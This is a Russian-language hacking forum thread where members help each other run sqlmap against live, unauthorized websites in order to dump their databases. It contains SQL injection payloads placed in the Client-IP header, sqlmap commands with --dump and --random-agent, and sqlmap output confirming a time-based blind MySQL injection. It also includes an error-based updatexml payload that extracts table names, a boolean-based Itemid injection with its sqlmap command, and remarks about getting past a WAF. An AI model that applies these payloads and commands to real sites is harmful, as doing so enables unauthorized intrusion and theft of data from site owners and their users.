Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Первый раз подобный отчёт об SQL
    Как прописать запрос в SQLmap ?
    Code:
    GET / HTTP/1.1
    Referer: http://www.google.com/search?hl=en&q=testing
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
    Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
    X-Forwarded-For: 127.0.0.1
    X-Forwarded-Host: localhost
    Accept-Language: en
    Via: 1.1 wa.www.test.com
    Origin: http://www.test.com/
    X-Requested-With: XMLHttpRequest
    Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ffca58d009
    Host: site.com (тут сайт который я проверял)
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    Accept: */*
     

    Attached Files:

  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    --headers='client-ip:*'
     
    GoodBoy and Sensoft like this.
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Code:
     sqlmap -u https://sote.io/ --headers='client-ip:*' --dump --random-agent
    Не прокатило
     
  4. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Ноооооооооооо
    Code:
    sqlmap -u site.ru --headers="Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='" --dump --random-agent
    Так что то пошло
    Code:
    [00:41:28] [INFO] (custom) HEADER parameter 'Client-IP #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
     
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же
     
    GoodBoy and Sensoft like this.
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Почти сдвиг есть в хорошую сторону
    там кажись waf (
    Ошибки есть пока что крутит BD
    Code:
    [00:41:56] [INFO] checking if the injection point on (custom) HEADER parameter 'Client-IP #1*' is a false positive
    [00:42:26] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
    (custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
    ---
    Parameter: Client-IP #1* ((custom) HEADER)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: -1' OR 3 AND SLEEP(5)-- TZaC21=6 AND 000358=000358 or 'tPXGszqn'='
    ---
    [00:43:36] [INFO] the back-end DBMS is MySQL
    web application technology: Apache
    back-end DBMS: MySQL >= 5.0.12
    [00:43:36] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [00:43:36] [INFO] fetching current database
    [00:43:36] [INFO] retrieved:
    [00:43:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prev nt potential disruptions
    [00:46:21] [ERROR] invalid character detected. retrying..
    there seems to be a continuous problem with connection to the target. Are you sure that you want to continue with further
    arget testing? [y/N]
    спасибо тебе, чётко помог.
     
    BabaDook likes this.
  7. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    SQLmap не может спалить дыру
    Code:
    POST /dologin HTTP/1.1
    Content-Length: 35
    Content-Type: application/x-www-form-urlencoded
    Referer: https://site
    Cookie: __cfduid=d5b944bc8a46493b7f7457c33594555a21527803716; PHPSESSID=tcbac2uoac16f1rog3anmocn46
    Host: site
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    email=%5c&password=g00dPa%24%24w0rD
    
    я так понимаю всё и за %5c \ с ней тоже дырка появляется
    если убрать дырка исчезает
    кто сталкивался ?
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Может КФ не дает? мало данных подробней надо
     
  9. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    лс чекни
     
  10. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    Было не раз такое.
    Похоже что это не скуля, а просто ошибка.
     
  11. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    не не это скуля
    я иногда такие раскручивал но ща не получается
    и там по ошибке ясно что скуля
     
  12. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    Здравствуйте, есть сайт с sqj inject site.com/trata=0 or updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--.
    Как мне его скормить эту уязвимость sqlmaпу что б я уже с ней мог в нем работать, вывод таблиц, парсинг информации и тд. Спасибо
     
  13. GoodBoy

    GoodBoy New Member

    Joined:
    24 Jul 2017
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.
    Он нашел один параметр и начал крутить, но неудачно.
    http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category
    Есть ли тут sql?
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Да есть.
     
    GoodBoy and ms13 like this.
  15. GoodBoy

    GoodBoy New Member

    Joined:
    24 Jul 2017
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Спасибо за ответ. Не составит ли вам труда показать пример запроса под этот случай? И как вы определили, что тут присутствует инъекция?
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Нет проблем:
    Он нашел один параметр и начал крутить.
    Запрос:
    HTML:
    http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category
    Это Blind Boolean Based вектор
     
    Veil and GoodBoy like this.
  17. GoodBoy

    GoodBoy New Member

    Joined:
    24 Jul 2017
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    А как задать это в sqlmap, тут уязвимый параметр itemid или id? Что писать в --data?
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    sqlmap -u 'http://site.com/index.php?Itemid=41&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category' -p Itemid

    Itemid.
    Не надо ничего в --data
     
    GoodBoy likes this.
  19. GoodBoy

    GoodBoy New Member

    Joined:
    24 Jul 2017
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Как с этим бороться: "unable to retrieve the number of database"?
    --no-cast --hex не помогает
     
    #679 GoodBoy, 8 Jun 2018
    Last edited: 8 Jun 2018
  20. GoodBoy

    GoodBoy New Member

    Joined:
    24 Jul 2017
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Может ли SQLMap выдавать ложные payload-ы для инъекций? (Не определяется даже тип БД, хотя SQLMap сказал, что параметр уязвим) Или это WAF мешает?
     
Loading...